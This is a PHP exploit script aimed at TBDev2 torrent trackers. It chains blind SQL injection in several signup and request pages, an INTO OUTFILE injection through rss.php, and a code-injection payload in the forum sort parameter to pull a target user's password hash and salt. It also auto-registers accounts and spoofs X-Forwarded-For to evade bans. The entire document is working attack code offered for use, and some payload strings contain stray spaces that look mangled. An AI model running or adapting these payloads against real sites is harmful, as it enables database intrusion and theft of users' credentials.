<?
/*+---------------------------------------------------------+
| TBDev2 Blind SQL Injection Exploit |
| |
| Автор: Rostov114 |
| Основан на Exploit от Qwazar |
| |
| Благодарности: +toxa+, NitroIMX, Draco, antichat.ru |
| HAXTA4OK |
+---------------------------------------------------------+*/
set_time_limit(0);
ignore_user_abort(1);
error_reporting(E_ALL & ~E_NOTICE);
function getcookie($url, $name, $password){
$res = send_xpl($url,"username=$name&password=$password", 'login');
preg_match("/Set-Cookie: uid=(\d+)*;/", $res, $matches);
$uid = $matches[1];
preg_match("/Set-Cookie: pass=([\w+\d+]{32});/", $res, $matches);
$passhash = $matches[1];
preg_match("/Set-Cookie: session=([\w+\d+]{32});/", $res, $matches);
$session = $matches[1];
if(isset($session))
$res = "session=$session;";
else
$res = "uid=$uid; pass=$passhash;";
if((isset($uid) and isset($passhash)) or isset($session))
return $res;
else
return false;
}
function send_xpl($url, $xpl, $type, $no_read=0){
global $id, $cookie, $name, $formated;
$u=parse_url($url);
$u['path'] = $u['path'] ? $u['path'] : '/';
switch($type)
{
case 'login':
$data = $xpl;
$req = "POST ".$u['path']."takelogin.php HTTP/1.0\r\n";
break;
case 'takesignup':
$data = "wantusername=admin&wantpassword=123456&passag ain=123456&gender=1&cou ntry=1&year=1970&month=01&day=01&";
$data .= "rulesverify=yes&faqverify=yes&ageverify=yes&email={$xpl}";
$req = "POST ".$u['path']."takesignup.php HTTP/1.0\r\n";
break;
case 'check':
$data = "action=email&email={$xpl}";
$req = "POST ".$u['path']."check_signup.php HTTP/1.0\r\n";
break;
case 'open_way':
$req ="GET ".$u['path']."details.php?id[]= HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
case 'do_reg':
$data = "agree=yes&do=register";
$req = "POST ".$u['path']."signup.php HTTP/1.0\r\n";
break;
case 'rss':
list($file, $path, $type) = $xpl;
$req ="GET ".$u['path']."rss.php?passkey=-1'+un i on+select+{$type}+from+users+where+id={$id}+into+ou t file+'{$path}torrents/images/{$file}.txt'+--+ HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
case 'reg':
$name = gen_name();
preg_match('/name="imagehash" value="([\w+\d+]{32})"/', send_xpl($url, '', 'do_reg'), $match);
$match[1] = $match[1] ? $match[1] : '0';
$data = "wantusername={$name}&wantpassword=123456&passa gain=123456&gender=1&coun try=1&year=1970&month=01&day=01&";
$data .= "rulesverify=yes&faqverify=yes&ageverify=yes&invite=000000000 00000000000000000000000&imagestring=0&";
$data .= "imagehash=".$match[1]."&email={$name}@".$u['host'];
$req = "POST ".$u['path']."takesignup.php HTTP/1.0\r\n";
break;
case 'requests':
$req ="GET ".$u['path']."$xpl HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
case 'viewoffers':
$req ="GET ".$u['path']."$xpl HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req.="Cookie: $cookie\r\n";
$req.="Connection: Close\r\n\r\n";
break;
case 'forum':
$req ="GET ".$u['path']."forum/forumdisplay.php?fid=2&sortby='];var_export(mysql_fetch_array(mysql_query('select+pas shash,secret+fr om+us ers+wher e+id={$id}')));exit();// HTTP/1.0\r\n";
$req.="Host: ".$u['host']."\r\n";
$req.="Connection: Close\r\n\r\n";
break;
}
if($type != 'requests' and $type != 'forum' and $type != 'open_way' and $type != 'rss' and $type != 'viewoffers')
{
$req .= "Host: ".$u['host']."\r\n";
if($formated)
$req .= "X-Forwarded-For: {$formated}\r\n";
$req .= "Content-Length: ".strlen($data)."\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Connection: close\r\n\r\n";
$req .= $data;
}
//echo $req;
$fs = @fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
fwrite($fs, $req);
while (!feof($fs)) {
$res .= fread($fs, 8192);
}
fclose($fs);
//if($type == 'reg')
//echo $res;
return $res;
}
function xpl($field, $condition, $pos){
global $id, $type;
switch($type)
{
case 'requests':
$xpl = "requests.php?action=reset&requ estid=-1+or+id=if(ascii(subs tring((select+$field+fr om+users+wh ere+id=$id),$pos,1))$condition,'1',(select+1+union+select+2))+--+";
break;
case 'viewoffers':
$xpl = "viewoffers.php?filter=or+use rs.id=if(ascii(substring((se lect+$field+from +use rs+where+u sers. id=$id),$pos,1))$condition,'1',(select+1+union+select+2))+--+";
break;
default:
$xpl = "-1'+or+id=if(ascii(substr ing((select+ $field+from+user s+wh ere+id=$id),$pos,1))$condition,'1',(select+1+union+select+2))+--+ @ukrnet.ua";
break;
}
return $xpl;
}
function gen_name()
{
$arr = array('a','b','c','d','e','f', 'g','h','i','j','k','l', 'm','n','o','p','r','s', 't','u','v','x','y','z', 'A','B','C','D','E','F', 'G','H','I','J','K','L', 'M','N','O','P','R','S', 'T','U','V','X','Y','Z');
$name = '';
for($i = 0; $i < 11; $i++)
{
$index = rand(0, count($arr) - 1);
$name .= $arr[$index];
}
return $name;
}
function cond($url, $field, $cond, $pos, $ch) {
global $type;
print load();
if(!preg_match('/Subquery returns/', send_xpl($url, xpl($field,$cond.$ch,$pos), $type)))
return 1;
else
return 0;
}
function rss($url)
{
preg_match('/<b>(\S+)details.php/', send_xpl($url, '', 'open_way'), $match);
if($match[1])
{
// Fix Windowz
$match[1] = str_replace('\\', '/', $match[1]);
$name = gen_name();
$xpl = array($name, $match[1], 'passhash');
send_xpl($url, $xpl, 'rss');
$file = @file($url.'torrents/images/'.$name.'.txt');
if(count($file) == 2)
{
$file[1] = str_replace(array("\r\n", "\n"), "", $file[1]);
echo "Trying to get passhash: ".$file[1]." [DONE]\r\n";
$name = gen_name();
$xpl = array($name, $match[1], 'secret');
send_xpl($url, $xpl, 'rss');
$file = @file($url.$name.'.txt');
$file[1] = str_replace(array("\r\n", "\n"), "", $file[1]);
die("Trying to get salt: ".$file[1]." [DONE]");
}
else
{
echo "File rss.php not vulnerable.\r\n";
}
}
else
{
echo "Opening of ways - failed.\r\n";
}
}
function forum($url)
{
$res = send_xpl($url, '', 'forum');
if(!preg_match("/'passhash' => '([\w+\d+]{32})'/", $res, $match))
{
echo "Forum absents or not vulnerable.\r\n";
die( "Exploit failed: Target is not vulnerable." );
}
echo "Trying to get passhash: ".$match[1]." [DONE]\r\n";
preg_match("/'secret' => '(\S+)'/", $res, $match);
die("Trying to get salt: ".$match[1]." [DONE]");
}
function check_user($url)
{
global $type, $id;
if(preg_match('/Subquery returns/', send_xpl($url, xpl("passhash",'-1',1), $type)))
{
die("An user does not exist with ID {$id}");
}
}
function load(){ static $i=0; switch($i){ case 0: $i++; return '\\'.chr(8); break; case 1: $i++; return '|'.chr(8); break; case 2: $i++; return '/'.chr(8); break; case 3: $i=0; return '-'.chr(8); break; } }
function isVulnerable($url, $nickname=false, $password=false) {
global $type, $cookie, $name;
if($nickname != '' and $password != '')
{
$type = 'requests';
if(!$cookie = getcookie($url, $nickname, $password))
{
die( "Incorrect login or password!" );
}
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'requests')))
{
echo "File requests.php absents or not vulnerable.\r\n";
}
$type = 'viewoffers';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'viewoffers')))
{
echo "File viewoffers.php absents or not vulnerable.\r\n";
die( "Exploit failed: Target is not vulnerable." );
}
}
else
{
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'check')))
{
echo "File check_signup.php absents or not vulnerable.\r\n";
}
else
{
$type = 'check';
}
if(!$type)
{
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'takesignup')))
{
echo "File takesignup.php not vulnerable.\r\n";
$res = send_xpl($url, '', 'reg');
//print $res;
if(preg_match("/Set-Cookie: pass=([\w+\d+]{32});/", $res, $matches))
{
$passhash = $matches[1];
preg_match("/Set-Cookie: uid=(\d+)*;/", $res, $matches);
$uid=$matches[1];
$cookie = "uid=$uid; pass=$passhash;";
if(preg_match("/Set-Cookie: mybbuser=([A-z0-9_]+);/", $res, $matches))
{
$mybbuser = $matches[1];
preg_match("/Set-Cookie: hash=([\w+\d+]{32});/", $res, $matches);
$hash = $matches[1];
$cookie .= " hash=$hash; mybbuser=$mybbuser;";
}
echo "Register...OK! User: {$name}\r\n";
rss($url);
$type = 'requests';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'requests')))
{
echo "File requests.php absents or not vulnerable.\r\n";
}
$type = 'viewoffers';
if(!preg_match('/Subquery returns/', send_xpl($url, xpl("passhash","=-1",1), 'viewoffers')))
{
echo "File viewoffers.php absents or not vulnerable.\r\n";
forum($url);
}
}
else
{
echo "Fieled register!\r\n";
forum($url);
}
}
else
{
$type = 'takesignup';
}
}
}
}
function getChar($url, $field, $pos, $lb=0, $ub=255) {
while(true) {
$M = floor($lb + ($ub-$lb)/2);
if(cond($url, $field, '<', $pos, $M)==1) {
$ub = $M - 1;
}
else if(cond($url, $field, '>', $pos, $M)==1) {
$lb = $M + 1;
}
else
return chr($M);
if($lb > $ub)
return -1;
}
}
echo "+---------------------------------------------------+\r\n";
echo "| TBDev2 Blind SQL Injection Exploit |\r\n";
echo "| |\r\n";
echo "| Author: Rostov114 |\r\n";
echo "| Based on Exploit from Qwazar |\r\n";
echo "| |\r\n";
echo "| Credits: +toxa+, NitroIMX, Draco, antichat.ru |\r\n";
echo "| HAXTA4OK |\r\n";
echo "+---------------------------------------------------+\r\n\r\n";
if($argc<2)
{
echo "+------------------------------------------------------+\r\n";
echo "| Multi mode: |\r\n";
echo "| Using tbdev2sql.php url target_id |\r\n";
echo "| |\r\n";
echo "| target_id - id of target member |\r\n";
echo "| Ex.: tbdev2xpl.php http://www.site.com/ 1 |\r\n";
echo "| |\r\n";
echo "| |\r\n";
echo "| Qwazar exploit mode: |\r\n";
echo "| Using tbdev2sql.php url target_id |\r\n";
echo "| |\r\n";
echo "| target_id - id of target member |\r\n";
echo "| login, password - login and password of any |\r\n";
echo "| existing account |\r\n";
echo "| Ex.: tbdev2xpl.php http://www.site.com/ 1 test 1234 |\r\n";
die("+------------------------------------------------------+");
}
global $type, $formated;
$url = $argv[1];
$id = $argv[2];
$nickname = $argv[3];
$pass = $argv[4];
$formated = ''; # если произошол бан на трекере то сюда ввести IP тобы обойти бан
//echo $url.":".$id."\r\n";
isVulnerable($url, $nickname, $pass);
check_user($url);
echo "Trying to get passhash: ";
for($i=1;$i<=32;$i++){
$c = getChar($url, "passhash", $i, 47, 103);
if($c==-1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
echo "Trying to get salt: ";
for($i=1;$i<=20;$i++){
$c = getChar($url, "secret", $i);
if($c==-1)
die("\r\nExploit failed\r\n");
else
echo $c;
}
echo " [DONE]\r\n";
?>